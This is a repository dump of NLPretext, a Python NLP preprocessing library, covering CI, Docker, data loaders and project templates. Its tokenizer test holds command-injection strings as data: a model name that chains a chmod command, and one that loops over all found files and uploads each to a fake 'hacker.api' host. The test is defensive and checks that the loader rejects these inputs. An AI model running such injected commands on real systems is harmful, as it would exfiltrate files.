├── nlpretext ├── py.typed ├── cli │ ├── __init__.py │ ├── __main__.py │ └── preprocess.py ├── _utils │ ├── daskloader.py │ ├── __init__.py │ ├── pandasloader.py │ ├── stopwords.py │ ├── file_loader.py │ └── phone_number.py ├── basic │ ├── __init__.py │ └── preprocess.py ├── token │ ├── __init__.py │ ├── preprocess.py │ └── tokenizer.py ├── _config │ ├── __init__.py │ ├── constants.py │ └── config.py ├── social │ ├── __init__.py │ └── preprocess.py ├── augmentation │ ├── __init__.py │ └── text_augmentation.py ├── __init__.py ├── preprocessor.py └── textloader.py ├── tests ├── __init__.py ├── test_tokenizer.py ├── test_phone_number.py ├── test_data_augmentation.py ├── test_file_loader.py └── test_textloader.py ├── references ├── .gitkeep └── logo_nlpretext.png ├── docs ├── source │ ├── _static │ │ └── images │ │ │ └── python_logo.png │ ├── tutorials │ │ ├── index.rst │ │ └── basic_notebook.ipynb │ ├── _templates │ │ ├── module.rst_t │ │ ├── versions.html │ │ └── package.rst_t │ ├── index.rst │ └── conf.py ├── Makefile ├── scripts │ └── buildsite.sh └── make.bat ├── .github ├── CODEOWNERS ├── ISSUE_TEMPLATE │ ├── config.yml │ ├── question.md │ ├── feature_request.md │ └── bug_report.md ├── workflows │ ├── release-drafter.yml │ ├── greetings.yml │ ├── ci.yml │ └── cd.yml ├── .stale.yml ├── release-drafter.yml ├── dependabot.yml └── PULL_REQUEST_TEMPLATE.md ├── .dockerignore ├── .editorconfig ├── docker ├── Dockerfile └── README.md ├── datasets └── external │ ├── get_language_dataset.sh │ └── get_stanfordtweets.sh ├── SECURITY.md ├── .pre-commit-config.yaml ├── CONTRIBUTING.md ├── CODE_OF_CONDUCT.md ├── Makefile ├── pyproject.toml ├── LICENSE ├── .gitignore └── README.md /nlpretext/py.typed: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /references/.gitkeep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /nlpretext/cli/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /references/logo_nlpretext.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artefactory/NLPretext/HEAD/references/logo_nlpretext.png -------------------------------------------------------------------------------- /docs/source/_static/images/python_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artefactory/NLPretext/HEAD/docs/source/_static/images/python_logo.png -------------------------------------------------------------------------------- /.github/CODEOWNERS: -------------------------------------------------------------------------------- 1 | # https://help.github.com/en/articles/about-code-owners 2 | 3 | * @julesbertrand @amaleelhamri @hugovasselin @Guillaume6606 4 | -------------------------------------------------------------------------------- /docs/source/tutorials/index.rst: -------------------------------------------------------------------------------- 1 | Tutorials 2 | ========= 3 | 4 | 5 | .. 
toctree:: 6 | :maxdepth: 4 7 | :glob: 8 | 9 | basic_notebook 10 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/config.yml: -------------------------------------------------------------------------------- 1 | # Configuration: https://help.github.com/en/github/building-a-strong-community/configuring-issue-templates-for-your-repository 2 | 3 | blank_issues_enabled: false 4 | -------------------------------------------------------------------------------- /docs/source/_templates/module.rst_t: -------------------------------------------------------------------------------- 1 | 2 | {%- if show_headings %} 3 | {{- [basename] | join(' ') | e | heading }} 4 | 5 | {% endif -%} 6 | .. automodule:: {{ qualname }} 7 | {%- for option in automodule_options %} 8 | :{{ option }}: 9 | {%- endfor %} 10 | -------------------------------------------------------------------------------- /.github/workflows/release-drafter.yml: -------------------------------------------------------------------------------- 1 | name: Release Drafter 2 | 3 | on: 4 | push: 5 | # branches to consider in the event; optional, defaults to all 6 | branches: 7 | - main 8 | 9 | jobs: 10 | update_release_draft: 11 | runs-on: ubuntu-latest 12 | steps: 13 | # Drafts your next Release notes as Pull Requests are merged into "main" 14 | - uses: release-drafter/release-drafter@v5.22.0 15 | env: 16 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} 17 | -------------------------------------------------------------------------------- /.dockerignore: -------------------------------------------------------------------------------- 1 | # Git 2 | .git 3 | .gitignore 4 | .github 5 | 6 | # Docker 7 | .dockerignore 8 | docker/ 9 | 10 | # IDE 11 | .idea 12 | .vscode 13 | 14 | # Byte-compiled / optimized / DLL files 15 | __pycache__/ 16 | **/__pycache__/ 17 | *.pyc 18 | *.pyo 19 | *.pyd 20 | .Python 21 | *.py[cod] 22 | *$py.class 23 | .pytest_cache/ 24 | ..mypy_cache/ 25 | 26 | # poetry 27 | .venv 28 | 29 | # C extensions 30 | *.so 31 | 32 | # Virtual environment 33 | .venv 34 | venv 35 | 36 | .DS_Store 37 | .AppleDouble 38 | .LSOverride 39 | ._* 40 | -------------------------------------------------------------------------------- /.editorconfig: -------------------------------------------------------------------------------- 1 | # Check http://editorconfig.org for more information 2 | # This is the main config file for this project: 3 | root = true 4 | 5 | [*] 6 | charset = utf-8 7 | end_of_line = lf 8 | insert_final_newline = true 9 | indent_style = space 10 | indent_size = 2 11 | trim_trailing_whitespace = true 12 | 13 | [*.{py, pyi}] 14 | indent_style = space 15 | indent_size = 4 16 | 17 | [Makefile] 18 | indent_style = tab 19 | 20 | [*.md] 21 | trim_trailing_whitespace = false 22 | 23 | [*.{diff,patch}] 24 | trim_trailing_whitespace = false 25 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/question.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: ❓ Question 3 | about: Ask a question about this project 🎓 4 | title: '' 5 | labels: question 6 | assignees: 7 | --- 8 | 9 | ## Checklist 10 | 11 | 12 | 13 | - [ ] I've searched the project's [`issues`](https://github.com/artefactory/NLPretext}/issues?q=is%3Aissue). 14 | 15 | ## ❓ Question 16 | 17 | 18 | 19 | How can I [...]? 20 | 21 | Is it possible to [...]? 
22 | 23 | ## 📎 Additional context 24 | 25 | 26 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: 🚀 Feature request 3 | about: Suggest an idea for this project 🏖 4 | title: '' 5 | labels: enhancement 6 | assignees: 7 | --- 8 | 9 | ## 🚀 Feature Request 10 | 11 | 12 | 13 | ## 🔈 Motivation 14 | 15 | 16 | 17 | ## 🛰 Alternatives 18 | 19 | 20 | 21 | ## 📎 Additional context 22 | 23 | 24 | -------------------------------------------------------------------------------- /docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10-slim-buster 2 | 3 | ENV LANG=C.UTF-8 \ 4 | LC_ALL=C.UTF-8 5 | 6 | RUN apt-get update && \ 7 | apt-get install -y --no-install-recommends \ 8 | curl coreutils \ 9 | && rm -rf /var/lib/apt/lists/* 10 | 11 | # Install Poetry 12 | ENV POETRY_VERSION=1.5.1 13 | RUN pip install --upgrade pip 14 | RUN python3 -m pip install "poetry==$POETRY_VERSION" 15 | 16 | WORKDIR /home/workspace 17 | 18 | COPY pyproject.toml ./ 19 | 20 | RUN poetry config virtualenvs.create false \ 21 | && poetry lock \ 22 | && poetry install --no-root --no-dev --no-interaction 23 | 24 | COPY . /home/docker_user/workspace/ 25 | 26 | ENTRYPOINT ["poetry", "run", "nlpretext"] 27 | -------------------------------------------------------------------------------- /nlpretext/cli/__main__.py: -------------------------------------------------------------------------------- 1 | # mypy: disable-error-code="attr-defined" 2 | 3 | import typer 4 | from nlpretext import __version__ 5 | from nlpretext.cli import preprocess 6 | from rich.console import Console 7 | 8 | app = typer.Typer( 9 | name="nlpretext", 10 | help="All the goto functions you need to handle NLP use-cases, integrated in NLPretext", 11 | add_completion=True, 12 | ) 13 | app.add_typer(preprocess.app, name="preprocess") 14 | console = Console() 15 | 16 | 17 | def version_callback(value: bool) -> None: 18 | """Prints the version of the package.""" 19 | if value: 20 | console.print(f"[yellow]nlpretext[/] version: [bold blue]{__version__}[/]") 21 | raise typer.Exit() 22 | -------------------------------------------------------------------------------- /tests/test_tokenizer.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | from nlpretext.token.tokenizer import LanguageNotInstalledError, _load_spacy_model 3 | 4 | 5 | @pytest.mark.parametrize( 6 | "bad_model_name", 7 | [ 8 | ("en_core_web_sm; chmod -x hacker"), 9 | ( 10 | "fr_core_news_sm | for file in $(find .); " 11 | 'do curl_command -X POST -H "Content-Type: multipart/form-data" ' 12 | '-F "data=@${file}" https-fake://hacker.api/upload; done' 13 | ), 14 | ], 15 | ) 16 | def test_load_spacy_model_validation(bad_model_name): 17 | with pytest.raises(LanguageNotInstalledError) as e: 18 | _load_spacy_model(bad_model_name) 19 | assert bad_model_name in str(e.value) 20 | -------------------------------------------------------------------------------- /.github/.stale.yml: -------------------------------------------------------------------------------- 1 | # Number of days of inactivity before an issue becomes stale 2 | daysUntilStale: 60 3 | # Number of days of inactivity before a stale issue is closed 4 | daysUntilClose: 7 5 | # Issues with these labels will never be considered stale 6 | exemptLabels: 7 | - pinned 8 | - security 9 
| # Label to use when marking an issue as stale 10 | staleLabel: wontfix 11 | # Comment to post when marking an issue as stale. Set to `false` to disable 12 | markComment: > 13 | This issue has been automatically marked as stale because it has not had 14 | recent activity. It will be closed if no further activity occurs. Thank you 15 | for your contributions. 16 | # Comment to post when closing a stale issue. Set to `false` to disable 17 | closeComment: false 18 | -------------------------------------------------------------------------------- /nlpretext/_utils/daskloader.py: -------------------------------------------------------------------------------- 1 | # mypy: disable-error-code="attr-defined" 2 | from typing import List, Union 3 | 4 | import dask.bag as db 5 | import dask.dataframe as dd 6 | 7 | 8 | def read_text(files_path: Union[str, List[str]], encoding: str): # type: ignore 9 | return db.read_text(files_path, encoding=encoding).str.strip().to_dataframe() 10 | 11 | 12 | def read_json(files_path: Union[str, List[str]], encoding: str): # type: ignore 13 | return dd.read_json(files_path, encoding=encoding) 14 | 15 | 16 | def read_csv(files_path: Union[str, List[str]], encoding: str): # type: ignore 17 | return dd.read_csv(files_path, encoding=encoding) 18 | 19 | 20 | def read_parquet(files_path: Union[str, List[str]], encoding: str): # type: ignore 21 | return dd.read_parquet(files_path, encoding=encoding) 22 | -------------------------------------------------------------------------------- /.github/workflows/greetings.yml: -------------------------------------------------------------------------------- 1 | name: Greetings 2 | 3 | on: 4 | pull_request: 5 | types: 6 | - opened 7 | - reopened 8 | - edited 9 | - labeled 10 | - unlabeled 11 | - synchronize 12 | issues: 13 | 14 | jobs: 15 | greeting: 16 | runs-on: ubuntu-latest 17 | if: ${{ !contains(github.head_ref, 'dependabot/') }} 18 | steps: 19 | - uses: actions/first-interaction@v1 20 | with: 21 | repo-token: ${{ secrets.GITHUB_TOKEN }} 22 | pr-message: 'Hello @${{ github.actor }}, thank you for submitting a PR! We will respond as soon as possible.' 23 | issue-message: | 24 | Hello @${{ github.actor }}, thank you for your interest in our work! 25 | 26 | If this is a bug report, please provide screenshots and **minimum viable code to reproduce your issue**, otherwise we can not help you. 27 | -------------------------------------------------------------------------------- /nlpretext/basic/__init__.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
18 | -------------------------------------------------------------------------------- /nlpretext/token/__init__.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | -------------------------------------------------------------------------------- /.github/release-drafter.yml: -------------------------------------------------------------------------------- 1 | # Release drafter configuration https://github.com/release-drafter/release-drafter#configuration 2 | # Emojis were chosen to match the https://gitmoji.carloscuesta.me/ 3 | 4 | name-template: "$NEXT_PATCH_VERSION" 5 | tag-template: "$NEXT_PATCH_VERSION" 6 | 7 | categories: 8 | - title: ":rocket: Features" 9 | labels: [enhancement, feature] 10 | - title: ":wrench: Fixes & Refactoring" 11 | labels: [bug, refactoring, bugfix, fix] 12 | - title: ":package: Build System & CI/CD" 13 | labels: [build, ci, testing] 14 | - title: ":boom: Breaking Changes" 15 | labels: [breaking] 16 | - title: ":pencil: Documentation" 17 | labels: [documentation] 18 | - title: ":arrow_up: Dependencies updates" 19 | labels: [dependencies] 20 | 21 | template: | 22 | ## What’s Changed 23 | 24 | $CHANGES 25 | 26 | ## :busts_in_silhouette: List of contributors 27 | 28 | $CONTRIBUTORS 29 | -------------------------------------------------------------------------------- /nlpretext/_config/__init__.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
18 | -------------------------------------------------------------------------------- /nlpretext/_utils/__init__.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | -------------------------------------------------------------------------------- /nlpretext/social/__init__.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | -------------------------------------------------------------------------------- /nlpretext/augmentation/__init__.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
18 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: 🐛 Bug report 3 | about: If something isn't working 🔧 4 | title: '' 5 | labels: bug 6 | assignees: 7 | --- 8 | 9 | ## 🐛 Bug Report 10 | 11 | 12 | 13 | ## 🔬 How To Reproduce 14 | 15 | Steps to reproduce the behavior: 16 | 17 | 1. ... 18 | 19 | ### Code sample 20 | 21 | 22 | 23 | ### Environment 24 | 25 | * OS: [e.g. Linux / Windows / macOS] 26 | * Python version, get it with: 27 | 28 | ```bash 29 | python --version 30 | ``` 31 | 32 | ### Screenshots 33 | 34 | 35 | 36 | ## 📈 Expected behavior 37 | 38 | 39 | 40 | ## 📎 Additional context 41 | 42 | 43 | -------------------------------------------------------------------------------- /docs/source/_templates/versions.html: -------------------------------------------------------------------------------- 1 | 2 | {%- if current_version %} 3 |
<div class="rst-versions" data-toggle="rst-versions" role="note" aria-label="versions">
4 |   <span class="rst-current-version" data-toggle="rst-current-version">
5 |     Other Versions
6 |     v: {{ current_version.name }}
7 |     <span class="fa fa-caret-down"></span>
8 |   </span>
9 |   <div class="rst-other-versions">
10 |     {%- if versions.tags %}
11 |     <dl>
12 |       <dt>Tags</dt>
13 |       {%- for item in versions.tags %}
14 |       <dd><a href="{{ item.url }}">{{ item.name }}</a></dd>
15 |       {%- endfor %}
16 |     </dl>
17 |     {%- endif %}
18 |     {%- if versions.branches %}
19 |     <dl>
20 |       <dt>Branches</dt>
21 |       {%- for item in versions.branches %}
22 |       <dd><a href="{{ item.url }}">{{ item.name }}</a></dd>
23 |       {%- endfor %}
24 |     </dl>
25 |     {%- endif %}
26 |   </div>
27 | </div>
28 | {%- endif %} 29 | -------------------------------------------------------------------------------- /docs/source/index.rst: -------------------------------------------------------------------------------- 1 | ========= 2 | NLPretext 3 | ========= 4 | 5 | 6 | Welcome to NLPretext's documentation! 7 | ======================================== 8 | 9 | The NLPretext library aimed to be a meta-library to be used to help you get started on handling your NLP use-case preprocessing. 10 | 11 | 12 | # Installation 13 | 14 | Beware, this package has been tested on Python `3.8`, `3.9` & `3.10` and will probably not be working under python **2.7** as **Python2.7** EOL is scheduled for December 2019. 15 | 16 | To install this library you should first clone the repository: 17 | 18 | pip install nlpretext 19 | 20 | 21 | .. toctree:: 22 | :maxdepth: 4 23 | :caption: Tutorials: 24 | 25 | ./tutorials/index 26 | 27 | .. toctree:: 28 | :maxdepth: 2 29 | :caption: API Reference: 30 | 31 | ./apidoc/modules 32 | 33 | Indices and tables 34 | ================== 35 | 36 | * :ref:`genindex` 37 | * :ref:`modindex` 38 | * :ref:`search` 39 | -------------------------------------------------------------------------------- /docker/README.md: -------------------------------------------------------------------------------- 1 | # Docker for nlpretext 2 | 3 | ## Installation 4 | 5 | To create Docker you need to run: 6 | 7 | ```bash 8 | make docker 9 | ``` 10 | 11 | which is equivalent to: 12 | 13 | ```bash 14 | make docker VERSION=latest 15 | ``` 16 | 17 | You could also provide name and version for the image itself. 18 | Default name is `IMAGE := nlpretext`. 19 | Default version is `VERSION := latest`. 20 | 21 | ```bash 22 | make docker IMAGE=some_name VERSION=1.0.4 23 | ``` 24 | 25 | ## Usage 26 | 27 | ```bash 28 | docker run -it --rm \ 29 | -v $(pwd):/workspace \ 30 | nlpretext bash 31 | ``` 32 | 33 | ## How to clean up 34 | 35 | To uninstall docker image run `make clean_docker` with `VERSION`: 36 | 37 | ```bash 38 | make clean_docker VERSION=1.0.4 39 | ``` 40 | 41 | like in installation, you can also choose the image name 42 | 43 | ```bash 44 | make clean_docker IMAGE=some_name VERSION=latest 45 | ``` 46 | 47 | If you want to clean all, including `build` run `make clean` 48 | -------------------------------------------------------------------------------- /docs/Makefile: -------------------------------------------------------------------------------- 1 | # Minimal makefile for Sphinx documentation 2 | # 3 | 4 | # You can set these variables from the command line, and also 5 | # from the environment for the first two. 6 | SPHINXOPTS ?= 7 | SPHINXBUILD ?= poetry run sphinx-build 8 | SPHINXAPIBUILD ?= poetry run sphinx-apidoc 9 | SPHINXMULTIVERSION ?= poetry run sphinx-multiversion 10 | SOURCEDIR = source 11 | BUILDDIR = build 12 | 13 | # Put it first so that "make" without argument is like "make help". 14 | .PHONY: help Makefile 15 | help: 16 | @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) 17 | 18 | multiversion: 19 | @$(SPHINXMULTIVERSION) $(SOURCEDIR) $(BUILDDIR)/html 20 | 21 | apidoc: 22 | @$(SPHINXAPIBUILD) -f -o source/apidoc/ ../nlpretext/ --implicit-namespaces -M -t source/_templates 23 | 24 | # Catch-all target: route all unknown targets to Sphinx using the new 25 | # "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS). 
26 | %: Makefile 27 | @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) 28 | -------------------------------------------------------------------------------- /datasets/external/get_language_dataset.sh: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | #!/bin/bash 19 | wget -O wili.zip https://zenodo.org/record/841984/files/wili-2018.zip?download=1 20 | mkdir -p wili && cp wili.zip wili && cd wili && unzip wili.zip && cd .. 21 | -------------------------------------------------------------------------------- /datasets/external/get_stanfordtweets.sh: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
18 | #!/bin/bash 19 | wget -O trainingandtestdata.zip http://cs.stanford.edu/people/alecmgo/trainingandtestdata.zip trainingandtestdata.zip 20 | mkdir -p tweets_sentiment && cp trainingandtestdata.zip tweets_sentiment && cd tweets_sentiment && unzip trainingandtestdata.zip 21 | -------------------------------------------------------------------------------- /nlpretext/_utils/pandasloader.py: -------------------------------------------------------------------------------- 1 | from typing import List, Union 2 | 3 | import pandas as pd 4 | from fsspec import open_files 5 | 6 | 7 | def _list_handler(func): 8 | def wrapper_list_handler(file_path: Union[str, List[str]], *args, **kwargs) -> pd.DataFrame: # type: ignore 9 | list_files = open_files(file_path) 10 | list_df = [func(file.path, *args, **kwargs) for file in list_files] 11 | df = pd.concat(list_df) 12 | return df 13 | 14 | return wrapper_list_handler 15 | 16 | 17 | @_list_handler 18 | def read_text(file_path: str, encoding: str) -> pd.DataFrame: 19 | df = pd.read_fwf(file_path, encoding=encoding, colspecs=[(None, None)]) 20 | return df 21 | 22 | 23 | @_list_handler 24 | def read_json(file_path: str, encoding: str) -> pd.DataFrame: 25 | df = pd.read_json(file_path, encoding=encoding) 26 | return df 27 | 28 | 29 | @_list_handler 30 | def read_csv(file_path: str, encoding: str) -> pd.DataFrame: 31 | df = pd.read_csv(file_path, encoding=encoding) 32 | return df 33 | 34 | 35 | @_list_handler 36 | def read_parquet(file_path: str, encoding: str) -> pd.DataFrame: 37 | df = pd.read_parquet(file_path, encoding=encoding) 38 | return df 39 | -------------------------------------------------------------------------------- /.github/dependabot.yml: -------------------------------------------------------------------------------- 1 | # Configuration: https://dependabot.com/docs/config-file/ 2 | # Docs: https://docs.github.com/en/github/administering-a-repository/keeping-your-dependencies-updated-automatically 3 | 4 | version: 2 5 | 6 | updates: 7 | - package-ecosystem: "pip" 8 | directory: "/" 9 | schedule: 10 | interval: "weekly" 11 | day: "monday" 12 | time: "09:00" 13 | allow: 14 | - dependency-type: "all" 15 | ignore: 16 | - dependency-name: "*" 17 | update-types: ["version-update:semver-patch"] 18 | labels: 19 | - draft 20 | - dependencies 21 | - python 22 | - package-ecosystem: "github-actions" 23 | directory: "/" 24 | schedule: 25 | interval: "weekly" 26 | day: "monday" 27 | time: "09:00" 28 | allow: 29 | - dependency-type: "all" 30 | labels: 31 | - draft 32 | - dependencies 33 | - github_actions 34 | - package-ecosystem: "docker" 35 | directory: "/docker/" 36 | schedule: 37 | interval: "weekly" 38 | day: "monday" 39 | time: "09:00" 40 | allow: 41 | - dependency-type: "all" 42 | labels: 43 | - draft 44 | - dependencies 45 | - docker 46 | -------------------------------------------------------------------------------- /SECURITY.md: -------------------------------------------------------------------------------- 1 | # Security 2 | 3 | ## 🔐 Reporting Security Issues 4 | 5 | > Do not open issues that might have security implications! 6 | > It is critical that security related issues are reported privately so we have time to address them before they become public knowledge. 
7 | 8 | Vulnerabilities can be reported by emailing core members: 9 | 10 | - artefactory [jules.bertrand@artefact.com](mailto:jules.bertrand@artefact.com) 11 | 12 | Please include the requested information listed below (as much as you can provide) to help us better understand the nature and scope of the possible issue: 13 | 14 | - Type of issue (e.g. buffer overflow, SQL injection, cross-site scripting, etc.) 15 | - Full paths of source file(s) related to the manifestation of the issue 16 | - The location of the affected source code (tag/branch/commit or direct URL) 17 | - Any special configuration required to reproduce the issue 18 | - Environment (e.g. Linux / Windows / macOS) 19 | - Step-by-step instructions to reproduce the issue 20 | - Proof-of-concept or exploit code (if possible) 21 | - Impact of the issue, including how an attacker might exploit the issue 22 | 23 | This information will help us triage your report more quickly. 24 | 25 | ## Preferred Languages 26 | 27 | We prefer all communications to be in English. 28 | -------------------------------------------------------------------------------- /.github/PULL_REQUEST_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | ## Description 2 | 3 | 4 | 5 | ## Related Issue 6 | 7 | 8 | 9 | ## Type of Change 10 | 11 | 12 | 13 | - [ ] 📚 Examples / docs / tutorials / dependencies update 14 | - [ ] 🔧 Bug fix (non-breaking change which fixes an issue) 15 | - [ ] 🥂 Improvement (non-breaking change which improves an existing feature) 16 | - [ ] 🚀 New feature (non-breaking change which adds functionality) 17 | - [ ] 💥 Breaking change (fix or feature that would cause existing functionality to change) 18 | - [ ] 🔐 Security fix 19 | 20 | ## Checklist 21 | 22 | 23 | 24 | - [ ] I've read the [`CODE_OF_CONDUCT.md`](https://github.com/artefactory/NLPretext}/blob/main/CODE_OF_CONDUCT.md) document. 25 | - [ ] I've read the [`CONTRIBUTING.md`](https://github.com/artefactory/NLPretext}/blob/main/CONTRIBUTING.md) guide. 26 | - [ ] I've updated the code style using `make format-code`. 27 | - [ ] I've written tests for all new methods and classes that I created. 28 | - [ ] I've written the docstring in Google format for all the methods and classes that I used. 29 | -------------------------------------------------------------------------------- /docs/source/_templates/package.rst_t: -------------------------------------------------------------------------------- 1 | 2 | {%- macro automodule(modname, options) -%} 3 | .. automodule:: {{ modname }} 4 | {%- for option in options %} 5 | :{{ option }}: 6 | {%- endfor %} 7 | {%- endmacro %} 8 | 9 | {%- macro toctree(docnames) -%} 10 | .. 
